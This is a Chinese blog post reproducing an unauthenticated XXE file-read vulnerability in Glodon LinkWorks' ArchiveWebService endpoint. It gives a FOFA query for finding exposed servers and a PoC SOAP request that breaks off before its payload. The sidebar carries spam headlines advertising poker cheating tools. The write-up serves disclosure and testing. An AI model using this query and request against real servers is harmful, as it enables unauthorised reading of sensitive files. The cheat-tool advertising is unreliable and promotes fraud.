广联达Linkworks ArchiveWebService XML实体注入漏洞复现
创始人
2025-01-07 20:36:42
0

0x01 产品简介

广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

0x04 漏洞复现

PoC

POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1 Host:  Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebServi

上一篇:中英双语介绍一级市场(Primary Market)和二级市场(Secondary Market)

下一篇:去中心化技术的变革力量:探索Web3的潜力

相关内容

热门资讯

透视数据(Wpk)微扑克辅助软... 透视数据(Wpk)微扑克辅助软件(透视)详细辅助新2025教程(都是真的有挂)1、微扑克辅助软件ai...
透视挂(德州aa扑克)aapo... 透视挂(德州aa扑克)aapoker有挂(透视)总是是有挂(详细辅助2025新版教程)小薇(透视辅助...
透视app!德州之星外挂,(w... 透视app!德州之星外挂,(wpk德州)都是是真的有挂(详细辅助揭秘攻略);1、每一步都需要思考,不...
透视私人局(wpK)微扑克全自... 透视私人局(wpK)微扑克全自动机器人(透视)详细辅助2025新版总结(原来真的有挂)1、下载好微扑...
透视脚本(AAPOkER)aa... 透视脚本(AAPOkER)aapoker辅助工具存在(透视)果然是有挂(详细辅助透明挂教程);1)a...
透视存在(wpK)wpk发牌逻... 透视存在(wpK)wpk发牌逻辑(透视)详细辅助解密教程(竟然是真的有挂)1、起透看视 wpk发牌逻...
透视辅助!智星德州菠萝偷偷看牌... 透视辅助!智星德州菠萝偷偷看牌功能,(线上wpk德州)都是是真的有挂(详细辅助wpk教程);1、实时...
透视苹果版(aapoker)a... 透视苹果版(aapoker)aapoker挂(透视)原来有挂(详细辅助安装教程)1、aapoker挂...
透视总结(Wpk)微扑克辅助软... 透视总结(Wpk)微扑克辅助软件(透视)详细辅助透明教程(原来有挂)1、点击下载安装,微扑克辅助软件...
透视了解!智星德州菠萝外挂,(... 透视了解!智星德州菠萝外挂,(手机德州)真是是有挂(详细辅助AI教程)1、构建自己的智星德州菠萝外挂...